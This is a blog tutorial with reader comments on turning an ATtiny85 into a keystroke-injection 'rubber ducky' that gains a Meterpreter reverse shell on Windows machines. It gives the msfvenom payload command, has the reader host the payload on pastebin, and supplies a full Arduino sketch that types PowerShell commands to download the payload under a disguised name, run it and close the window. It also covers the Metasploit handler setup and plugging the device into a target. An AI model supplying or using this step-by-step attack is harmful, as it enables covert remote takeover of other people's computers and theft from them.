How to get meterpreter shell with a Rubber ducky – attiny85

In the previous blog I introduced what a rubber ducky is and how to use an attiny85 as one. If you haven't read that, you can check it out here. The attiny85 is an Arduino-compatible chip with very little flash, so we can't store a large payload on it. Here is a way to deliver a payload no matter how big it is: generate it with msfvenom, upload it to pastebin, and have the ducky type a short PowerShell command that fetches the script from pastebin over the internet and runs it on the target. As soon as the script runs, the meterpreter payload connects back to the listener and you get a session.

No more boring sessions, just follow the steps.


Video Demo


step 1: Create a payload

Use msfvenom to create a reverse_tcp payload. Use the VBS output format instead of an EXE: VBS is plain text, which is what we need for pastebin, and the target runs it with the built-in Windows Script Host. Remember the LPORT you choose here, the handler in step 4 must use the same one.

# msfvenom -p windows/meterpreter/reverse_tcp -f vbs --smallest LHOST=<attacker ip> LPORT=444 -o /root/Desktop/payload.txt


step 2: upload code to pastebin

Now open payload.txt from the desktop and copy the whole code. Go to pastebin.com, click "NEW PASTE", paste the code and create the paste (setting it to Unlisted keeps it out of the public feed). A new paste will be created. Note down its URL, we need it in the next step.


step 3: Flashing Ducky

The attiny85 has to be programmed to download the raw paste and execute it. Use the sketch below; all you need to edit is the pastebin URL in the DownloadFile line. Replace "change_to_Your_url" with the RAW URL of your paste. That is the normal paste URL with "/raw/" added in between, so it looks something like "https://pastebin.com/raw/abcd..". Without "/raw/" you would download the pastebin HTML page instead of the script.

After changing the URL, compile and flash the sketch to the chip with the Arduino IDE. If you don't know how to do that, check my previous blog on the 1$ rubber ducky.


#include "DigiKeyboard.h"

// Everything runs once from setup(); with it in loop() the whole keystroke
// sequence would be replayed on the target every time the delay expired.
void setup() {
 int d=1000;
 // this is generally not necessary but with some older systems it seems to
 // prevent missing the first character after a delay:
 DigiKeyboard.sendKeyStroke(0);
 DigiKeyboard.delay(d);
 // Windows key alone opens the Start menu; typing searches, Enter launches
 DigiKeyboard.sendKeyStroke(0,MOD_GUI_LEFT);
 DigiKeyboard.delay(500);
 DigiKeyboard.print("powershell");
 DigiKeyboard.delay(50);
 DigiKeyboard.sendKeyStroke(KEY_ENTER);
 DigiKeyboard.delay(3000);   // give the PowerShell window time to appear
 DigiKeyboard.print("$client = new-object System.Net.WebClient");
 DigiKeyboard.sendKeyStroke(KEY_ENTER);
 DigiKeyboard.delay(d);
 // change_to_Your_url must be the RAW pastebin URL of the vbs payload
 DigiKeyboard.print("$client.DownloadFile('change_to_Your_url','Sys32Data.vbs')");
 DigiKeyboard.sendKeyStroke(KEY_ENTER);
 DigiKeyboard.delay(3000);   // let the download finish before running the file
 DigiKeyboard.print("start Sys32Data.vbs");
 DigiKeyboard.sendKeyStroke(KEY_ENTER);
 DigiKeyboard.delay(1000);
 // Alt+F4 closes the PowerShell window. The modifier has to be the second
 // argument: KEY_F4|MOD_ALT_LEFT ORs the modifier bit into the key code and
 // sends a plain F4.
 DigiKeyboard.sendKeyStroke(KEY_F4,MOD_ALT_LEFT);
}

void loop() {
 // nothing left to do
}

step 4: setup handler

Set up a reverse_tcp handler in msfconsole, as for any Metasploit payload.

# msfconsole

msfconsole takes a minute to come up. Then load the handler and set the payload, port and host. LPORT and LHOST must match what you gave msfvenom in step 1, otherwise the payload connects to the wrong place and no session ever arrives.

1. Handler

msf> use multi/handler

2. set payload

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST <attacker ip>

5. exploit

msf exploit(handler) > exploit

Wait for the target to connect back

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.102:444
[*] Starting the payload handler…


step 5: Plug in on the target

Simplest of all: just plug the attiny85 into the target system. With this method you can get a shell on almost any Windows PC that can reach the internet, over LAN or WAN. Over a WAN the LHOST has to be reachable from the target, so you need a public IP or a port forward to your handler, and keep in mind that a stock msfvenom payload is likely to be caught by up-to-date antivirus. Any doubts or questions? Post them in the comment section below. If you like this blog, give me a like on Facebook, add me on Google Plus and subscribe to my YouTube channel for video tutorials.

susmith HCK

I'm a computer enthusiast, basically, and I love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16, and I would like to explore security vulnerabilities and the latest tech news and share them with you. If you like all this stuff, add me on Facebook and Google Plus.

3 Responses

  1. Amal says:

    You said LAN or WAN. Won’t we need port forward setup to do it on WAN?

  2. mr.robot says:

    Yes, you actually do…